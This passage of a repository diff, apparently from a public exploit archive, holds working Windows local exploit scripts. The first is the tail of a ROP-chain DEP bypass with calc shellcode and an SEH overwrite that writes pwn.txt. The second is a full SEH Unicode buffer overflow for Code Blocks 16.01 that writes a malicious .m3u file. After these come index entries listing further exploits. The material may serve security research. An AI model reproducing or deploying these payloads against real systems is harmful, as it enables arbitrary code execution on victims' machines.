|
||||||
|
# Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
|
||||||
|
# Note: This should be at least length of shellcode
|
||||||
|
0x100362c6, # XOR EAX,EAX # RETN
|
||||||
|
0x10033fb2, # ADD AL,0C9 # RETN
|
||||||
|
0x10033fb2, # ADD AL,0C9 # RETN
|
||||||
|
0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN
|
||||||
|
|
||||||
|
# Set ECX to writable location
|
||||||
|
0x1003603f, # POP ECX # RETN [SkinMagic.dll]
|
||||||
|
0x10047d30, # &Writable location [SkinMagic.dll]
|
||||||
|
|
||||||
|
# Set EDI to ROP NOP
|
||||||
|
0x100395c2, # POP EDI # RETN [SkinMagic.dll]
|
||||||
|
0x10032982, # RETN (ROP NOP) [SkinMagic.dll]
|
||||||
|
|
||||||
|
# Do PUSHAD and be 1337
|
||||||
|
0x10037654, # POP EAX # RETN
|
||||||
|
0xa140acd2, # CONSTANT
|
||||||
|
0x100317c8, # ADD EAX,5EFFC883 # RETN
|
||||||
|
0x1003248d, # PUSH EAX # RETN
|
||||||
|
|
||||||
|
# Used to jump to ESP
|
||||||
|
0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll]
|
||||||
|
]
|
||||||
|
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||||
|
|
||||||
|
ropChain = create_rop_chain()
|
||||||
|
|
||||||
|
# CALC.EXE for POC
|
||||||
|
shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
|
||||||
|
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
|
||||||
|
"\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
|
||||||
|
"\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
|
||||||
|
"\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
|
||||||
|
|
||||||
|
# 148 Bytes needed to return to ROP CHAIN
|
||||||
|
paddingBeginning = "B"*148
|
||||||
|
|
||||||
|
# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)
|
||||||
|
nopLen = 444 - len(ropChain)
|
||||||
|
nopSled = '\x90'*nopLen
|
||||||
|
|
||||||
|
# Padding to SEH needs to consider the 420 bytes remaining - shellcode
|
||||||
|
paddingMiddleLen = 420 - len(shell)
|
||||||
|
paddingMiddle = 'B'*paddingMiddleLen
|
||||||
|
|
||||||
|
# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
|
||||||
|
# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
|
||||||
|
seh = "\xee\x43\x40"
|
||||||
|
|
||||||
|
# Exploit Visualization #
|
||||||
|
#------------------------#
|
||||||
|
# BBBBBBBBBBBBBBBBBBBB #
|
||||||
|
#------------------------#
|
||||||
|
# ROP CHAIN #
|
||||||
|
#------------------------#
|
||||||
|
# NOPS #
|
||||||
|
#------------------------#
|
||||||
|
# SHELL CODE #
|
||||||
|
#------------------------#
|
||||||
|
# BBBBBBBBBBBBBBBBBBBB #
|
||||||
|
#------------------------#
|
||||||
|
# SEH #
|
||||||
|
#------------------------#
|
||||||
|
|
||||||
|
exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh
|
||||||
|
|
||||||
|
file = open("pwn.txt", 'w')
|
||||||
|
file.write(exploit)
|
||||||
|
file.close()
|
31
exploits/windows/local/48344.py
Executable file
31
exploits/windows/local/48344.py
Executable file
|
@ -0,0 +1,31 @@
|
||||||
|
# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
|
||||||
|
# Date: 2020-04-17
|
||||||
|
# Exploit Author: T3jv1l
|
||||||
|
# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
|
||||||
|
# Software version: 16.01
|
||||||
|
|
||||||
|
|
||||||
|
buffer="A"*536 #buffer
|
||||||
|
buffer+="\x61\x41" #POPAD + Aligned
|
||||||
|
buffer+="\xF2\x41" #POP/POP/RET
|
||||||
|
|
||||||
|
#----------------------Align the eax to point to the shellcode PART -----------------------
|
||||||
|
#buffer+="\x90" #NOP
|
||||||
|
#buffer+="\x6e" #venetian padding
|
||||||
|
#buffer+="\x05\x37\x13" #add eax, 0x13003700
|
||||||
|
#buffer+="\x6e"
|
||||||
|
#buffer+="\x2d\x36\x13" #sub eax, 0x13003600
|
||||||
|
#buffer+="\x6e" #venetian padding
|
||||||
|
#buffer+="\x50" #push eax
|
||||||
|
#buffer+="\x6e" #Venetian padding
|
||||||
|
#buffer+="\xc3" #ret
|
||||||
|
|
||||||
|
#----------------------Shellcode PlaceHOLDER ----------------------------------------------
|
||||||
|
#uffer+="\x90"*111
|
||||||
|
#buffer+=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM01PDIJEP1Y0QT4KPPNPTK1BLLTK1BMDDKSBNHLO6WPJNFNQKOVLOLC13LM2NLO07QXOLMKQ7WJBZR220WDKQBN0TKOZOLTKPLN1T8ZCOXKQZ10QTKQIMPKQXSTKOYLXISOJ19TKNTTKM1XV01KOFL7Q8OLMKQGW08YPD5L6KSSMJXOKSMMTBU9TPXDKR8MTKQYCRF4KLLPKTKPXMLKQJ3TKKTDKKQZ0E9OTMTO4QK1K1Q291JPQKO9PQOQOQJTKN2JKDM1MRJKQ4M3UGBKPM0M0R0RHNQTKRO4GKOXUWKL0VU6BPVQXVFDU7MUMKO9EOLM63LLJE0KKYP2UM5WKOWN3T2RORJKP1CKOJ5BCS1RL33NNS5RX2EKPA")
|
||||||
|
buffer+="\xcc\xcc\xcc\xcc"
|
||||||
|
buffer+="\x90"*(5000-len(buffer))
|
||||||
|
f=open('exploit.m3u','w');
|
||||||
|
f.write(buffer);
|
||||||
|
f.close();
|
||||||
|
print "[+] File created."
|
|
@ -11030,6 +11030,8 @@ id,file,description,date,author,type,platform,port
|
||||||
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
|
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
|
||||||
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
|
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
|
||||||
48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
|
48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
|
||||||
|
48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
|
||||||
|
48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -18100,6 +18102,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
|
48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
|
||||||
48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
|
48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
|
||||||
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
|
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
|
||||||
|
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -42578,3 +42581,6 @@ id,file,description,date,author,type,platform,port
|
||||||
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
|
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
|
||||||
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
|
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
|
||||||
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
|
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
|
||||||
|
48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
|
||||||
|
48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
|
||||||
|
48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue